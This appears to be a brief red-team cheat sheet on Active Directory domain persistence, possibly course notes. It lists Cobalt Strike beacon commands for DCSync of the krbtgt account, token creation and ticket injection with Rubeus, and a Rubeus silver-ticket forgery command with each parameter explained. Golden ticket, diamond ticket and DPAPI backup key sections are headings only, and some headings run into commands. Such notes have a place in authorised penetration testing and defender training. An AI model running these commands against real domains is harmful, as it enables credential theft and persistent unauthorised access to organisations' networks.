Domain Persistence
DCSync
beacon> dcsync contoso.com CONTOSO\krbtgtTicket Forgery
# Sacrificial session
beacon> make_token CONTOSO\Administrator FakePass
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:doIFb[...snip...]kYi0x
beacon> rev2selfSilver Tickets
# /service is the target service.
# /aes256 is the AES256 hash of the target computer account.
# /user is the username to impersonate.
# /domain is the FQDN of the computer's domain.
# /sid is the domain SID.
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/lon-db-1 /aes256: /user:Administrator /domain:DOMAIN.COM /sid: /nowrapGolden Tickets
Diamond Tickets (OPSEC Safe IMO)
DPAPI Backup Key
Last updated